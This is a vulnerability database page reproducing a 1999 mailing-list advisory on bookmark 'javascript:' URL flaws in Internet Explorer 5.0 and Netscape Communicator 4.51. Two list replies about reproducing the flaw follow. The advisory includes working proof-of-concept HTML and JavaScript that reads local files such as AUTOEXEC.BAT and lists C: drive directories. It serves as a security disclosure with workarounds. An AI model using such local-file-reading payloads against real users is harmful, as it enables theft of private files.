Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

browser.bookmarks.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Security flaws in Internet Explorer 5.0 and Netscape Communicator 4.51 expose local file access.

Code
`Date: Sun, 9 May 1999 17:34:10 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Bookmarks security vulnerabilities in both Internet Explorer 5.0 and Netscape Communicator 4.51 (Win95)  
  
  
There is a design flaw in both Internet Explorer 5.0 and Netscape Communicator 4.51 Win95  
(guess all 4.x versions of both browsers are vulnerable too) in the way they handle bookmarks.  
The problem arises if the user bookmarks (adds to favorites) and later chooses a specially designed  
"javascript:" URL. When the bookmark is chosen later, the JavaScript code in it  
is executed in the context (the same domain and protocol) of the document  
opened prior to choosing the bookmark. So, the JavaScript code has access to  
documents in the same domain. An interesting case is choosing the bookmark  
when the active document is a local file (the protocol is "file:") - then the  
JavaScript code has access to local files and directories.  
The vulnerabilities are more serious for Internet Explorer 5.0.  
  
Some of the vulnerabilities are:  
  
For Internet Explorer 5.0:  
Reading local files if the filename is known;  
Reading files in the domain of the active document (even if the web server is blocked by a firewall);  
Reading links in the active document and in documents in the same domain;  
Web spoofing of documents in the domain of the active document;  
  
Demonstration is available at: http://www.nat.bg/~joro/favorites.html  
  
For Netscape Communcator 4.51:  
Browsing local directories;  
Reading local files in the directory of the active document;  
Reading links in the active document and in documents in the same domain;  
Web spoofing of documents in the domain of the active document;  
  
Demonstration is available at: http://www.nat.bg/~joro/bookmarks.html  
  
Workaround: Disable JavaScript or do not bookmark untrusted pages  
  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
-------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/favorites.html>  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "Favorites" vulnerability  
</TITLE>  
</HEAD>  
There is a design flaw in Internet Explorer 5.0 (guess 4.x is vulnerable too) in the way it handles favorites.  
This vulnerability allows reading local files and sending them to an arbitrary server.  
<BR>  
If an user adds to favorites a specially designed "javascript:" URL, later opens a local file and then choose the URL from the Favorites, his local files may be read if the filename is known.  
<BR>  
Probably there are more serious exploits.  
<BR><BR>  
Demonstration:  
<BR>  
<BR>  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {html='AUTOEXEC.BAT reading<object id=\'myTDC\' width=100 height=100 classid=\'CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83\'><param name=\'DataURL\' value=\'c:/autoexec.bat\'><param name=\'UseHeader\' value=False><param name=\'CharSet\' VALUE=\'iso-8859-1\'><param name=\'FieldDelim\' value=\'}\'><param name=\'RowDelim\' value=\'}\'><param name=\'TextQualifier\' value=\'}\'></object><form><textarea datasrc=\'#myTDC\' datafld=\'Column1\' rows=10 cols=80></textarea></form><SCRIPT>s=\'Here is your AUTOEXEC.BAT:\';setTimeout(\'alert(s+document.forms[0].elements[0].value)\',4000)</SCRIPT>';a=window.open(window.location);a.document.open();a.document.write(html);a.document.close();} s='<TITLE>Reading AUTOEXEC.BAT</TITLE>This page demonstrates reading AUTOEXEC.BAT with IE 5.0<BR>To test it:<BR>1) Add this page to favorites (Favorites|Add to favorites...)<BR>2) Open a local html, gif or jpeg file with IE (the protocol must be \'file://\')<BR>3) Choose from favorites the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>'">  
Reading AUTOEXEC.BAT  
</A>  
  
<BR>  
  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {a=window.open('file://c:/test.txt');alert(a.document.body.innerText);a.close();}html='<TITLE>Reading TEST.TXT</TITLE>This page demonstrates reading the file C:\\TEST.TXT with IE 5.0<BR>To test it:<BR>1) Add this page to favorites (Favorites|Add to favorites...)<BR>2) Open a local html, gif or jpeg file with IE (the protocol must be \'file://\')<BR>3) Create a short text file C:\\TEST.TXT<BR>4) Choose from favorites the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>';">  
Reading file "c:\test.txt"  
</A>  
  
<BR>  
Workaround: Disable Javascript or do not add to favorites untrusted pages.  
</HTML>  
  
-------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/bookmarks.html>  
  
<HTML>  
<HEAD>  
<TITLE>  
Netscape Communicator bookmark vulnerabilities  
</TITLE>  
</HEAD>  
There is a design flaw in Netscape Communicator 4.51/Win95 (guess all 4.x versions are vulnerable) in the way it handles bookmarks.  
<BR>  
This allows at least browsing local directories, reading local files and sending them to an arbitrary server. Probably there are more serious exploits.  
<BR>  
If the user bookmarks a specially designed "javascript:" URL, later open local file and then choose the bookmark, the bug is triggered.  
<BR>  
  
<BR>  
Demonstration:  
<BR>  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {a=window.open('wysiwyg://1/file:///c|/');s='Here are some files in your C: drive:\n';for(i=1;i<5;i++) s+= a.document.links[i]+'\n';alert(unescape(s));a.close();} html='<TITLE>Browsing directories with Netscape Communicator</TITLE>This page demonstrates browsing direcotries with Netscape Communicator<BR>To test it:<BR>1) Bookmark this page (Bookmarks|Add Bookmark)<BR>2) Open a local html, text, gif, ... file or just browse directories with Netscape Communicator (the protocol must be \'file://\')<BR>3) Choose from bookmarks the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>';">  
Browsing directories  
</A>  
  
<BR>  
  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {var f = new java.io.File('C:\\AUTOEXEC.BAT');var fis = new java.io.FileInputStream(f); i=0; b='Here is your file: \n';while ( ((a=fis.read()) != -1) && (i<1000) ) { b += String.fromCharCode(a);i++;}alert(b);}; html='<TITLE>Reading AUTOEXEC.BAT with Netscape Communicator</TITLE>This page demonstrates reading AUTOEXEC.BAT with Netscape Communicator<BR>To test it:<BR>1) Bookmark this page (Bookmarks|Add Bookmark)<BR>2) Open a local html, text, gif, ... file in the root of C:\\ or just browse the root of C:\\ with Netscape Communicator (typing \'file:///c|/\' would do)<BR>It is possible to read any local file in the direcotry the user has opened<BR>3) Choose from bookmarks the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>';">  
Reading AUTOEXEC.BAT  
</A>  
<BR>  
Workaround: Disable Javascript or do not bookmark untrusted pages.  
</HTML>  
  
-------------------------------------------------------------------------------  
  
Date: Tue, 11 May 1999 21:59:32 -0700  
From: Jim Reavis <[email protected]>  
To: [email protected]  
Subject: Re: Bookmarks security vulnerabilities in both Internet Explorer 5.0 and Netscape Communicator 4.51 (Win95)  
  
I did get this to work as described with IE 5.0 on Win 95. It failed until  
I re-read the directions and opened a local GIF with the "file:///" syntax  
versus "c:\"  
  
Using NT SP5, I got an access denied in a large dialog box that contained  
Georgi's code. He didn't mention NT in his original advisory, so I assume  
it is just Win 9X issue?  
  
Jim Reavis  
SecurityPortal.com - the focal point for security on the Net  
[email protected] <mailto:[email protected]>  
  
  
  
-----Original Message-----  
From: Russ [mailto:[email protected]]  
Sent: Monday, May 10, 1999 2:20 PM  
To: [email protected]  
Subject: Re: Bookmarks security vulnerabilities in  
both Internet Explorer 5.0 and Netscape Communicator 4.51 (Win95)  
  
I am unable to reproduce this on IE 5.0 with SP5. I get an error message  
stating "Cannot find server or DNS error" after following Georgi's  
instructions using TEST.TXT.  
  
Even pasting the entire script in the address box fails to reproduce his  
described effects.  
  
Cheers,  
Russ - NTBugtraq moderator  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
bookmarks security vulnerabilitiesinternet explorer 5.0netscape communicator 4.51local file accessjavascript code executionweb spoofinguntrusted pages
27